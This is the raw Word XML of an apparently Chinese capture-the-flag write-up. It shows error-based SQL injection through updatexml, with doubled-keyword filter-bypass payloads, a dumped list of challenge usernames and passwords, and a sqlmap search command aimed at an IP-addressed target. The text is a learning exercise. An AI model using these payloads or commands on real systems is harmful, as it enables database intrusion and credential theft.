                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>nd UpDaTeXmL(1,concat(0x7e,(SeLeCt DataBase()),0x7e),1)--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26FE5FF4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得到表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5876F6E5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rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tfweb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55031CE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之后使用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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="6541A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</w:tcPr>
          <w:p w14:paraId="47C1300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' aandnd UpDaTeXmL(1,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>concat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">(0x7e,(selselectect </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>GrOuP_CoNcAt(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>column_name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rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> frfromom InFoorRmAtIoN_ScHeMa.columns wh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>where</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ere table_name=0x7573657273),0x7e)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)--+&amp;password=123&amp;debug_mode=true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D305CF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得到用户表名和密码表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E31B9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&lt;span style='color:red;'&gt;SQL 错误: (1105, "XPATH syntax error: '~username,password~'")&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112119B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最后直接使用用户名和密码名得到admin密码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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="61768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1958693B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' aandnd UpDaTeXmL(1, concat(0x7e, (selselectect concat(username, 0x3a, passwo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>rd) frfromom users liMIT 0,1), 0x7e), 1)--+&amp;password=123&amp;debug_mode=true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="220DACD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' aandnd UpDaTeXmL(1, (selselectect concat(username, 0x3a, passwo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>rd) frfromom users liMIT 0,1), 1)--+&amp;password=123&amp;debug_mode=true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B3F47A2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得到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B71D6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admin:T3$t!ngTh!s1sV3ryH@rdT0Gu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2131D13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alice:password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ED374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bob:123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BC90B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carol:carol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014F3FB5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dave:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1qaz2wsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104FC2A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eve:pm123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1431447C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frank:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1q2w3e4r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F055CD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grace:q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>werasdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4B3F0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heidi:1357924680</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149F1A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ivan:666666~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FFEE3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judy:88888888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A2248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猜测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380243DE"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admin_T3$t!ngTh!s1sV3ryH@rdT0Gu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e$$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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="2804C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7C4A9078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欢迎 admin 用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA8716A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flag{this_is_a_fake_flag_and_has_expired}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BEFBFF6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嘿，管理员大人，这个flag好像过期很久了，我帮你手动更新了一下，已经放在数据库里了，如果你找不到的话，模糊搜索一下flag关键词就能找到啦！特意给你留个言</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1450C04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下一步呢</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B0EE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得到flag{this_is_a_fake_flag_and_has_expired}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF7983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由于我并不知道怎么模糊搜索一下flag关键词，止步于此</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ED9815">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E4E89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即使是使用了sqlmap页不能找到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9F30B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sqlmap -u "http://58.199.156.34:8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?username=admin&amp;password=T3%24t%21ngTh%21s1sV3ryH%40rdT0Gue%24%24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">" --level=5 --risk=3 --search --keywords="flag" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E63A338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ospace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Noto Sans SC">
    <w:panose1 w:val="020B0200000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="20000083" w:usb1="2ADF3C10" w:usb2="00000016" w:usb3="00000000" w:csb0="60060107" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="sans-serif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7578E8"/>
    <w:rsid w:val="027578E8"/>
    <w:rsid w:val="3D842BF3"/>
    <w:rsid w:val="542B433A"/>
    <w:rsid w:val="64191A38"/>
    <w:rsid w:val="70B56644"/>
    <w:rsid w:val="7E8D4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TML Code"/>
    <w:basedOn w:val="7"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1083</Words>
  <Characters>4238</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>64</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4668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2025-06-13T03:48:00Z</dcterms:created>
  <dc:creator>范</dc:creator>
  <cp:lastModifiedBy>范</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-13T10:18:33Z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2F66A97B955C422E8B2543EDA8678A24_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiMWExMjYzZTNkZWM1YjE4YjdlNzYyYWQ0ZmM0ZWRjODciLCJ1c2VySWQiOiIxNDE1NjkyNzk3In0=</vt:lpwstr>
  </property>
</Properties>
</file>